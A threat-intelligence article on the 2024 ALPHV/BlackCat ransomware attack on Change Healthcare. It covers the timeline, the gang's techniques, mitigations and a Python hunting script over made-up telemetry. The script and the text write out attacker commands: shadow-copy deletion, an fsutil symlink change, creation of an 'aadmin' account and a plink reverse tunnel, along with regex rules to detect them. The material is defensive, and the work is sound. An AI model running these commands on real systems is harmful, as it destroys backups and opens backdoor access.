ALPHV/BlackCat/Noberus Ransomware Group
Change Healthcare was attacked in 2024 by a cybercrime group affiliated with the ALPHV/BlackCat/Noberus Ransomware-as-a-Service platform. Change Healthcare provides services that enable information, claims, and payments to be exchanged between physicians, pharmacists, health plans, and governments. To put that in perspective, Change Healthcare processes one out of every three medical records in the United States. ALPHV/BlackCat affiliates are experienced and exceptionally capable cyber criminals who are expected to continue targeting the Healthcare and Public Health Sector in addition to other U.S. critical infrastructure. The group is suspected to be a successor of the REvil, DarkSide, and BlackMatter threat groups.
Incident
On February 12, 2024, the criminals used compromised credentials to remotely access a Change Healthcare Citrix portal, an application used to provide remote desktop access. Multi-factor authentication was not enabled on this portal. ALPHV/BlackCat deployed the ransomware nine days later, on February 21, 2024. The ALPHV/BlackCat ransomware actors employ a multiple-extortion model: they demand a ransom to decrypt files, threaten to publish stolen data on the dark web, and threaten to launch a denial-of-service attack.
On March 7, 2024, Change Healthcare confirmed that a substantial quantity of data had been exfiltrated from its environment between February 17, 2024, and February 20, 2024. On March 13, 2024, Change Healthcare obtained a dataset of the exfiltrated files that was safe to investigate and began preliminary targeted analysis. On April 22, 2024, Change Healthcare publicly confirmed that the impacted data could cover a substantial proportion of people in America.
Change Healthcare is a subsidiary of UnitedHealth Group through Optum. The CEO of UnitedHealth Group, Andrew Witty, testified before the House Energy and Commerce Committee Subcommittee on Oversight and Investigations in the “Examining the Change Healthcare Cyberattack” hearing that he made the decision to pay the ransom "guided by the overriding priority to do everything possible to protect peoples’ personal health information."
The breach exposed the personal information of more than 100 million people, making it the largest healthcare data breach in U.S. history. The compromised data included health insurance member IDs, patient diagnoses, treatment details, and Social Security numbers. In response to the attack, UnitedHealth paid a $22 million ransom.
Technical Details
ALPHV/BlackCat affiliates are known to use advanced social engineering techniques and to conduct open source research on a target company in order to gain initial access. The threat actors impersonate company IT or helpdesk personnel, using phone calls or text messages (T1598) to trick employees into revealing their login credentials, and then use those credentials to access the targeted network (T1586). Affiliates of ALPHV/BlackCat typically communicate their demands through TOR, Tox, email, or encrypted messaging applications and provide instructions for restoring the encrypted files.
Characteristics:
- The first widely known ransomware written in Rust.
- The ransomware is entirely command-line driven and human-operated.
- It can stop ESXi virtual machines and delete ESXi snapshots to hinder recovery efforts.
- It encrypts the victim's files with AES-128 (falling back to ChaCha20 on hosts without AES hardware acceleration).
- Encrypted files are given a random seven-character alphanumeric extension, and a ransom note named RECOVER-(that seven-character extension)-FILES.txt is dropped alongside them.
- It carries an encrypted configuration that specifies the services and processes to be stopped, exempted directories/files/file extensions, and a list of stolen credentials for use within the target network.
- It deletes all Volume Shadow Copies (for example via vssadmin delete shadows /all /quiet and wmic shadowcopy delete) so that files cannot be restored locally.
- It performs privilege escalation through a UAC bypass (T1548) that abuses the CMSTPLUA COM interface (a technique also used by LockBit and Avaddon).
- It enables "remote to local" and "remote to remote" symbolic link evaluation (fsutil behavior set SymlinkEvaluation R2L:1 and R2R:1) so that network shares reached through symbolic links can also be encrypted.
- It uses the [Windows Restart Manager API](https://www.crowdstrike.com/en-us/blog/windows-restart-manager-part-1/) to close processes and shut down Windows services that may keep a file open during encryption.
Additionally, the ALPHV/BlackCat threat actors are known to create a user account named "aadmin", to steal Kerberos tokens for domain access (T1558), and to use the Evilginx2 framework to obtain MFA credentials, login credentials, and session cookies. Once initial access is established, affiliates use the legitimate remote access and tunneling tools Plink and Ngrok to maintain and tunnel remote access into the network.
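Several of the behaviours listed above leave artifacts that a SOC can hunt for in process-creation telemetry and on file shares: shadow-copy deletion, the fsutil symbolic-link change, creation of the "aadmin" account, Plink/Ngrok execution, and the RECOVER-<extension>-FILES.txt ransom note whose extension matches the one appended to encrypted files. The script below is an added example written for this page; it is not code from any of the cited reports or from the ALPHV/BlackCat tooling. The events are constructed Sysmon Event ID 1 / Security 4688 style records flattened to "host|user|image|commandline", and the hosts, users, file names and the 203.0.113.10 address are hypothetical.

```python
"""Hunt for ALPHV/BlackCat pre-encryption and intrusion artifacts in constructed telemetry.

Added example for this page. The events and directory listing are constructed
for illustration and are not taken from the Change Healthcare incident.
"""
import re
from dataclasses import dataclass

# Constructed process-creation events: "host|user|image|commandline" (hypothetical hosts/users).
SAMPLE_PROCESS_EVENTS = [
    "WS01|CORP\\jdoe|C:\\Windows\\System32\\vssadmin.exe|vssadmin.exe delete shadows /all /quiet",
    "WS01|CORP\\jdoe|C:\\Windows\\System32\\fsutil.exe|fsutil behavior set SymlinkEvaluation R2L:1",
    "WS01|CORP\\jdoe|C:\\Windows\\System32\\fsutil.exe|fsutil behavior set SymlinkEvaluation R2R:1",
    "DC01|CORP\\svc_backup|C:\\Windows\\System32\\net.exe|net user aadmin P@ssw0rd! /add",
    "WS02|CORP\\mlee|C:\\Users\\mlee\\Downloads\\ngrok.exe|ngrok tcp 3389",
    "WS02|CORP\\mlee|C:\\Tools\\plink.exe|plink.exe -ssh -R 3389:127.0.0.1:3389 user@203.0.113.10",
    "WS03|CORP\\acole|C:\\Program Files\\Office\\WINWORD.EXE|WINWORD.EXE /n report.docx",
    "WS01|CORP\\jdoe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic shadowcopy delete",
]

# Constructed listing of a hypothetical file share after encryption.
SAMPLE_LISTING = [
    "Q4_report.docx.a1b2c3d",
    "RECOVER-a1b2c3d-FILES.txt",
    "payroll.xlsx",
    "notes.txt",
    "budget.pdf.a1b2c3d",
    "README",
]

# Command-line rules for the behaviours described on this page. Each rule is searched
# against "<image> <commandline>" so a binary invoked by full path still triggers.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("symlink_evaluation_enabled",
     re.compile(r"fsutil(?:\.exe)?\s+behavior\s+set\s+SymlinkEvaluation\s+R2[LR]:1", re.I)),
    ("aadmin_account_created",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+aadmin\b.*\s/add\b", re.I)),
    ("tunneling_tool",
     re.compile(r"(?:^|[\\\s])(?:plink|ngrok)(?:\.exe)?\b", re.I)),
]

# Ransom note name: RECOVER-<seven alphanumeric chars>-FILES.txt; the captured group is
# the same extension appended to encrypted files in that directory.
RANSOM_NOTE = re.compile(r"^RECOVER-([A-Za-z0-9]{7})-FILES\.txt$")


@dataclass(frozen=True)
class Detection:
    host: str
    user: str
    rule: str
    commandline: str


def scan_process_events(lines):
    """Return one Detection per (event, rule) pair that matches."""
    hits = []
    for line in lines:
        host, user, image, cmd = line.split("|", 3)
        haystack = f"{image} {cmd}"
        for name, pattern in RULES:
            if pattern.search(haystack):
                hits.append(Detection(host, user, name, cmd))
    return hits


def hosts_with_pre_encryption_chain(hits):
    """Hosts showing both shadow-copy deletion and the symlink change: the
    pre-encryption sequence, which deserves immediate isolation."""
    by_host = {}
    for h in hits:
        by_host.setdefault(h.host, set()).add(h.rule)
    required = {"shadow_copy_deletion", "symlink_evaluation_enabled"}
    return {host for host, rules in by_host.items() if required <= rules}


def ransom_note_extensions(listing):
    """Extensions learned from ransom notes present in the listing."""
    found = set()
    for name in listing:
        m = RANSOM_NOTE.match(name)
        if m:
            found.add(m.group(1))
    return found


def encrypted_files(listing, extensions):
    """Files whose final extension matches one learned from a ransom note."""
    out = []
    for name in listing:
        if RANSOM_NOTE.match(name):
            continue
        _, dot, ext = name.rpartition(".")
        if dot and ext in extensions:
            out.append(name)
    return out


if __name__ == "__main__":
    hits = scan_process_events(SAMPLE_PROCESS_EVENTS)
    for h in hits:
        print(f"[{h.rule}] {h.host} {h.user}: {h.commandline}")
    print("pre-encryption chain on:", sorted(hosts_with_pre_encryption_chain(hits)))
    exts = ransom_note_extensions(SAMPLE_LISTING)
    print("ransom-note extensions:", sorted(exts))
    print("encrypted files:", encrypted_files(SAMPLE_LISTING, exts))
```

Matching the ransom note's extension against file extensions is what separates a BlackCat encryption event from ordinary files with odd suffixes, and the per-host chain check turns two medium-severity process alerts into one high-confidence "encryption is about to start" signal; in a live environment the same rules would be fed from Sysmon or EDR process telemetry rather than the constructed list.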
Immediate Steps to Reduce Your Ransomware Risk
- Provide security awareness training so employees can recognize phishing emails, calls, and text messages that impersonate IT or helpdesk staff.
- Require multi-factor authentication on all remote access portals, paired with strong password policies.
- Regularly audit assets and data to detect both approved and unauthorized devices and software.
- Disable unused network ports and uninstall non-essential applications.
- Regularly apply vendor-issued security patches to hardware, applications, and APIs.
- Perform regular backups and store them in a secure location that resides in a separate environment, so that deleting Volume Shadow Copies on the victim host does not destroy the only copy.
- Implement endpoint security software to detect and block attacks.
- Implement data loss prevention (DLP) solutions to enable granular classification of data based on sensitivity and to provide real-time alerts to security teams when data exfiltration occurs.
References
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a
https://www.hhs.gov/sites/default/files/blackcat-analyst-note.pdf
https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware/
https://www.unitedhealthgroup.com/ns/health-data-breach.html
https://www.ibm.com/think/news/change-healthcare-22-million-ransomware-payment
https://www.picussecurity.com/resource/blog/alphv-ransomware